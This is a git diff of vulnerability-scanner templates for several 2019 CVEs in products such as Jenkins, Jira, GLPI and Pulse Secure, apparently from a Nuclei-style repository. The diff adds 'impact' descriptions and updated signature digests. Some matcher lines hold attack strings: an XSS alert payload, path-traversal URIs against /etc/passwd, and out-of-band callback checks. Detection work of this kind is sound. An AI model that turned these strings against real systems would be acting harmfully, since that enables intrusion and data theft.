-# digest: 4a0a00473045022065c3fa2cfea8cfbd2296185e67ba1ec15aff996cc92ece1f0328f4f4e782f357022100a817811e942e68e0f43dcf0011232846c9dfe1a3f3e06d06780f1b0ffb1850d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210088625ed04df926a5539b92f2fd96a637ec3f71dd24df8cd54252cee61e98378b022100e42f1249e56673426a404776932bc33f4358179db3070615debc529b816fbffd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml
index 5da847bd15..1d8d9985b4 100644
--- a/http/cves/2019/CVE-2019-1010287.yaml
+++ b/http/cves/2019/CVE-2019-1010287.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.'
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b442dd8d93a4b21f277e180250b8283046f33010578fab0d4bc05ec8683c04190221009572102fcef01515e7d6bd2e027760394d694feef27268d303bc7feaa1177fd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201659279d24cbe80c6457c89097ddd2cc30d83305845c6d87bec84dcd2d37d98e0220677bdfdbaded5eb32a64a9aa6162a2713e9aed1e967a50a1eddfc650588ff3f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml
index 7695e491f5..cf69a18157 100644
--- a/http/cves/2019/CVE-2019-1010290.yaml
+++ b/http/cves/2019/CVE-2019-1010290.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
   remediation: |
     Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4b0a00483046022100d61212392a23fdac392c4ed81b6a77a49ae518b38140abb3c54d2f95a4e229fb022100c358d318b69f3b85e533cf7e9d0d3d2095a02b0927e13a36d63c9f41d5211ff6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220459d0d8e8c44302e1a4590862e5d95c5ffea3228744d1dd9d53b3d0e964f2ac7022100c11223b0868d691f267d5d33d06cd47e9300fc395868fbde0841e4eeabcb26d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml
index 5d44a4bf2e..6a4905cc2f 100644
--- a/http/cves/2019/CVE-2019-10232.yaml
+++ b/http/cves/2019/CVE-2019-10232.yaml
@@ -5,6 +5,8 @@ info:
   author: RedTeamBrasil
   severity: critical
   description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         regex:
           - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
         part: body
-# digest: 4a0a00473045022005b2e800c0f290982843bcbed21f703b4fb0a281edd2d5cf08b4e9af3bd70a61022100c3d227829ab06cc7fb55ed0e42fb5949155dbfeb5bfaca289897d76eb1149966:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f5d12bd99420905582d48fa41a56054cc4c1bf28c2804ee6af07cd252ce2972b022027817a63b0e1df6fafc94b18be0ab9361bbf20ba132237f5e327684cd73a13f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml
index 6a7df0178c..34f550bbc9 100644
--- a/http/cves/2019/CVE-2019-10405.yaml
+++ b/http/cves/2019/CVE-2019-10405.yaml
@@ -5,6 +5,8 @@ info:
   author: c-sh0
   severity: medium
   description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue.
+  impact: |
+    The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches.
   remediation: |
     Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: kval
         kval:
           - x_jenkins
-# digest: 4a0a004730450220026751b074743d9f4ebdba2945393d5634b9ce666c93c7e83db867214a038946022100bfec5c7e573fe867e34ca06f28cb7285f551e5546eb4a53c6db731c69b0ad20c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022065467e08899f2d341f66b944164e7c54f5bfb2db041730b9a3a684fac2a5a602022100af572d8e45a4fc87dc1c1476dacd78c6febaeaaf24ba0e6349d327257edbaba9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml
index e9db9cdc3f..a9a7d246d0 100644
--- a/http/cves/2019/CVE-2019-10475.yaml
+++ b/http/cves/2019/CVE-2019-10475.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to a patched version of the Jenkins build-metrics plugin or apply the necessary fixes provided by the vendor.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a41c376c7ba410eff604e88de36434792add1f6c807cc924c3f198becd73cdd902202f7b8f274afa797faaecd33750f9585b8c308f5a301e5e2ff0eae7465690216b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a2fe08fdba53c676ae1be94b133e4fd2db5f90036d762fc8f11b35c223a42e5a022013417a6de197e039beea4994e93a63efd6c9a1a7744e80e3dcfc81caad998d60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml
index a4e3401fbd..4f7efb9038 100644
--- a/http/cves/2019/CVE-2019-10692.yaml
+++ b/http/cves/2019/CVE-2019-10692.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: |
     Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher).
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e8550c61caf92de6e5497bbdf60c77edf202244f0af9b08aa4831352ed73501802207225cdc75043036658398e6d83b2139fce3c94914864542fd3bdcfc07e9e4ca9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022068c107788bbed44cd3b235e580f366493e8f63f2f65df6de4560fb297b59a845022100e06c4e769511efe3c1976e8b62bd223ce78475f268f86ebbc3e13f4559ac88a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml
index b8a6ae4530..4eabf9076d 100644
--- a/http/cves/2019/CVE-2019-10717.yaml
+++ b/http/cves/2019/CVE-2019-10717.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205505172d14970360ac69e0883d24925dafd4bd04fb5b182ae28a5ae9ba941acc0220057fc76f39434640259312b8472ee3eb35c6fa58296bdf5c70250da7d9f6262e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b54bf06c09be6def3abe407177b2dbe242e0350d97d1acbcb905578626162d28022100b2f969d95e5427538df00f2a59b84beb4125a32107c8a0edc94b44602f5e499c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml
index c63dd006fb..5772f03f2a 100644
--- a/http/cves/2019/CVE-2019-10758.yaml
+++ b/http/cves/2019/CVE-2019-10758.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Upgrade mongo-express to version 0.54.0 or higher.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
@@ -40,4 +42,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a00463044022068410a1ce8de582e9f61000c039c3d7783d38a357349286cc22ff7b5804ced9702206c666df64e3a91afd1aec96f71f93c30fed14e89d7d0d79f18b6032eaa8a4a80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206d3f547c34ffb0dc4576e3574c70ac58b92ec8dfe5a727846967d4d8fdec037e022100df108dd3213d0da089b6fa527da23dad05a65b27b7a2d5f14a1e4d13fd67d111:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml
index 72ee152bc7..c077405ffc 100644
--- a/http/cves/2019/CVE-2019-11013.yaml
+++ b/http/cves/2019/CVE-2019-11013.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further exploitation of the system.
   remediation: |
     Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ae2e6c33288e0e408d3ba6ec4645643c34fdffd9f739fc7510fe5e1d4fbdad3a0220614335afa4919aefbb4ea1ec4cdc4120f40f252f1243cb83fc57a3656f498255:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210081bc2969e6957012392c9f445eb540528f3ed94bcffdd0cc5b2e4556b96a04ce022100f178a6afe7d5f6dc2033edad2564693f2ddd14c3918a58f82f51e9346e0c99ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml
index f11ff0e0c9..33acc1e253 100644
--- a/http/cves/2019/CVE-2019-11248.yaml
+++ b/http/cves/2019/CVE-2019-11248.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.
+  impact: |
+    An attacker can exploit this vulnerability to gather sensitive information, potentially leading to further attacks.
   remediation: |
     Disable or restrict access to the Debug Endpoint pprof to prevent unauthorized access.
   reference:
@@ -42,4 +44,4 @@ http:
           - "Profile Descriptions"
           - "goroutine profile: total"
         condition: or
-# digest: 4a0a00473045022100a2c6acbb1b78f7bd0258437c2cc4d9c575c5b530e6a10281ae70e1a27277d604022058c7deddcd285cc9a03289a0c31225811980babe40b9a2d8b0450afdf47ebae7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220267d60ebaf57324b15d53078cb59ea5d1c9dbe36168f8c3d223e1b97074bfab602203109201c7cd79ede6dbf2a1a1010dc274f93f5fdf668d7b4b78a010bb9a3a0d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml
index e701f7bdce..5ee2534156 100644
--- a/http/cves/2019/CVE-2019-11370.yaml
+++ b/http/cves/2019/CVE-2019-11370.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Apply the latest patch or upgrade to a version that addresses the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - status_code_2 == 200
           - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>')
         condition: and
-# digest: 4b0a00483046022100a8fb59f24439598731f4db8ada91a270dd2cc39048d3760c54d3cab3817f4742022100bb0d681f2996583a509cf880397bd952b2530ee7489329ef180ecf0d8e2d2ac5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204b2237d2aaa34cd996ad795308b6ca3e98eb2d0c2afaa56dac8b06727428b1ba022067113a2fd9e1145397340cd6f389a7d4378acfc6e98c67ec23c7f22507cc690a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml
index 07a7bd28a7..978081ad92 100644
--- a/http/cves/2019/CVE-2019-11510.yaml
+++ b/http/cves/2019/CVE-2019-11510.yaml
@@ -5,6 +5,8 @@ info:
   author: organiccrap
   severity: critical
   description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
+  impact: |
+    An attacker can access sensitive information stored on the system, potentially leading to further compromise.
   remediation: |
     Apply the latest security patches and updates provided by Pulse Secure.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022023431491e4e313f1c90ead7cf4dbc59dd9eca16027bc30492b37fc7132070ffb022100c6e95903c32a90b4058a79b5ac2729ef62eb2d35e40732099c47d0d3af67f223:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210096064d059d58b6551ecf2192640214e376a57f8b70f880f9fe2ed924f07f3e5f0220750aedd6614544fbe4f9915f9c61d6f423cf251581804ca29be15f9f6eb810a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml
index 9b0569b815..4f1e164379 100644
--- a/http/cves/2019/CVE-2019-11580.yaml
+++ b/http/cves/2019/CVE-2019-11580.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds.    Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system.
   remediation: |
     Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability.
   reference:
@@ -16,8 +18,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-11580
-    epss-score: 0.97457
-    epss-percentile: 0.99953
+    epss-score: 0.97491
     cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
   metadata:
     max-request: 2
@@ -52,4 +53,4 @@ http:
         part: body_2
         words:
           - "CVE-2019-11580"
-# digest: 4a0a0047304502206beed7ab18fb57b9893366da87521711808003ca2c9b954f2f1cd612b0999c40022100e32a1c901c745f3f4a192003ce2dfc5a73cdc8f25f9eabed4ef2637ae92aaea4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204335c7b4f8df9115045bf553057527e8d06056548894c442f36a0fcec0eb02fe022100b5ecd7d417caaaf1fa7423c0b7b1ad1d8fe02f4eb7cc1ec9b6ef19619673e194:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml
index 9cf961ada0..2bfd88dc11 100644
--- a/http/cves/2019/CVE-2019-11581.yaml
+++ b/http/cves/2019/CVE-2019-11581.yaml
@@ -5,6 +5,8 @@ info:
   author: ree4pwn
   severity: critical
   description: Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the necessary security patches or upgrade to a fixed version provided by Atlassian to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
           - "\\(v8\\.1\\.[0-1]"
           - "\\(v8\\.2\\.[0-2]"
         condition: or
-# digest: 490a0046304402206a1db6b9311debf9ff42b812ebb11e1d76a4c51c8f6ce5529b59d2133a1fe93b02202458f5ad8e487d0fe6fbd37c30900f6ae33aa0c8e6d11596f55b0473c54c0ae1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022010051890899a9475d8ff6b2654c0ddb559866feeae41caf565f447878fe02c760220326f60e17ccf5db5db45e499ffc24279da0e9aa39d1a59fb7456147305f2a361:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml
index 64b9f429aa..4be6e3ee75 100644
--- a/http/cves/2019/CVE-2019-11869.yaml
+++ b/http/cves/2019/CVE-2019-11869.yaml
@@ -11,6 +11,8 @@ info:
     request is for an admin page). An unauthenticated attacker can consequently inject
     a payload into the plugin settings, such as the
     yuzo_related_post_css_and_style setting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: dsl
         dsl:
           - "contains(tolower(header_2), 'text/html')"
-# digest: 4a0a00473045022053af1aafe690c0f9a812b162bc88d1070b4c5bbf17cec7003ba2afd63ac7e2d8022100e83684c3356cb05e4f04900a722dd63cce5a3651ec2036ad2047215128cb579f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022010577c9f3b6fb59d7f8b9d77c9d9aabba0d301a943e1750c3dbfe29bd71cf6c6022100c9885b608a0d2fb07affa5a859f5acb8c1b78c31434974124e7c14f916ae12c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml
index 2140d7c038..4202ecbcd2 100644
--- a/http/cves/2019/CVE-2019-12276.yaml
+++ b/http/cves/2019/CVE-2019-12276.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the entire system.
   remediation: |
     A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022073a8ff4306b040dce2c962d856349353f46305b9cca1e78e6e103e1fa58cf58d022100b1d6ba65010118eccad1d30df30307736edace293f4da752388265628b350658:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bf13db476751315c92a8710e53d1b7c5d711a0774331474a16a884b563ae9aec0220720b4da41d47bed2f94532cef2ac4b77cc799734efbbe346229626fb00dbaaa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml
index 41c150c412..8bdce7a6d4 100644
--- a/http/cves/2019/CVE-2019-12314.yaml
+++ b/http/cves/2019/CVE-2019-12314.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or even a complete compromise of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Deltek Maconomy 2.2.5.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f4d60fcebc5cb191f1067a1a2cb1137aa7bbb880a13c7e668b1d4c53c5de47a802206cceef3198e614ced22c25109892ac56a6995505ac93018855e470fbf628160e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c1dba7c07274bbbdf2b378bf3046a6f72468a67b0b0e1d2f2a034e9edb5920cd022038c7f50423eb8d88d8b26957fe26c9a6fa52f4c41e7ff45eede9436f428c3569:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml
index a898008694..79f855dff8 100644
--- a/http/cves/2019/CVE-2019-12461.yaml
+++ b/http/cves/2019/CVE-2019-12461.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220134f448eec10238beadf628455978466314793ff10cb8fe4bbc133f2837a18a0022074047d49b5d55dbc44de72bb822f7caf6e7a331dfb1a04a4e37a5d86262c95d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220778d9de676f3a3876c9a49f84992a690638d9b57c4c9e3cb7d2eb7d76ad5346d022100e046b6ddd2066eeb61a17172bfcea22e1c67ea4fd2ab7a23b6746c97276fd2d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml
index d0929078ad..1d68f35d3d 100644
--- a/http/cves/2019/CVE-2019-12581.yaml
+++ b/http/cves/2019/CVE-2019-12581.yaml
@@ -5,6 +5,8 @@ info:
   author: n-thumann
   severity: medium
   description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b564802a8180cf39fae2c9e7c13ede5f43626f0bbb8cca706c6709f5203f1174022100e68600522496568f300b8c7d2d4f0a9ad39f646fa017d4b86c7665eb4b0c1489:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202a5ef87dfb6329c7449e17c2b9efeb26a12be1c70e2ae06da8405a838690c05a02203bb26c35dfdba3f452c0e0051c884a625a6a66ca85a7b788ef4d96f4ea78792a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml
index 4609a9f197..9e821cf84a 100644
--- a/http/cves/2019/CVE-2019-12583.yaml
+++ b/http/cves/2019/CVE-2019-12583.yaml
@@ -5,6 +5,8 @@ info:
   author: n-thumann,daffainfo
   severity: critical
   description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks.
+  impact: |
+    An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges.
   remediation: |
     Apply the latest firmware update provided by Zyxel to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b2efae1049d0c55490b929b8c03cfca03e6a60648c443bfca8b9851821ccb18d02204c44f28ce7ac7fb23b76f0d7f72b155d799b42f939f10e7a7d8c0df18dfa198a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008e4560a8969d0484acbc5f4a2a909a2441dc0779c34add29be0f5fbb33671ff7022069533caa62bae60d30e183d2481e1a4705aef1ae14c225aa8c61ee293fcf8833:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml
index d6c8392435..b140cff091 100644
--- a/http/cves/2019/CVE-2019-12593.yaml
+++ b/http/cves/2019/CVE-2019-12593.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: |
     Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c9bde1cf1364540e26100adb0bac215cf1d873ac31e735dde3ce1a3f14026f8a02203aa549ecfab96b88ec95299cd0263c7fa0e60a621bdac8d848b8f8a3648e7895:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204476637f0422a7a095c26263775e4babec327fdc1d56281b73617dac1aced3bd0220739fb58ed834eef9d88dfa679b7490cc45a26b2f61c43eb2041c2bb67cd8206d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml
index 68a19baa94..9f0d0e6d32 100644
--- a/http/cves/2019/CVE-2019-12616.yaml
+++ b/http/cves/2019/CVE-2019-12616.yaml
@@ -5,6 +5,8 @@ info:
   author: Mohammedsaneem,philippedelteil,daffainfo
   severity: medium
